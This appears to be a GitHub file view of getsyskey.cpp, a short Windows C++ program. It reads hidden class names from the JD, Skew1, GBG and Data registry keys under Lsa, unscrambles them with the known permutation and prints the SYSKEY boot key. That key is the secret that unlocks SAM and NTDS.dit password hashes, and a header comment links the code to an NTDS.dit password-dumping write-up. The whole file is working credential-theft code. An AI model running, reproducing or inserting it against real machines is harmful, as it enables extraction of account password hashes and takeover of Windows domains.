-
Notifications
You must be signed in to change notification settings - Fork 10
Expand file tree
/
Copy pathgetsyskey.cpp
More file actions
48 lines (46 loc) · 1014 Bytes
/
getsyskey.cpp
File metadata and controls
48 lines (46 loc) · 1014 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
/* Steal from http://www.zcgonvh.com/post/ntds_dit_pwd_dumper.html */
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
void main()
{
char* c[]={"JD","Skew1","GBG","Data",NULL};
char box[16]={0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3, 0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7 };
char key[33]={0};
int pos=0;
for(int i=0;c[i]!=NULL;i++)
{
char cc[80]="SYSTEM\\CurrentControlSet\\Control\\Lsa\\\0\0\0\0\0\0\0\0\0\0\0\0";
HKEY hkey=0;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,strcat(cc,c[i]),0,0x19,&hkey);
char tmp[16]={0};
unsigned long len=16;
DWORD d=0;
RegQueryInfoKey(hkey,tmp,&len,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0);
for(int ii=0;ii<8;ii++)
{
key[pos]=tmp[ii];
pos++;
}
RegCloseKey(hkey);
}
BYTE tmp[16]={0};
BYTE tmp2[16]={0};
for(i=0;i<16;i++)
{
int pos=i*2+2;
char c=key[pos];
key[pos]='\0';
tmp[i]=strtol(key+i*2,NULL,16);
key[pos]=c;
}
for(i=0;i<16;i++)
{
tmp2[i]=tmp[box[i]];
}
for(i=0;i<16;i++)
{
printf("%02x",tmp2[i]);
}
printf("\n");
}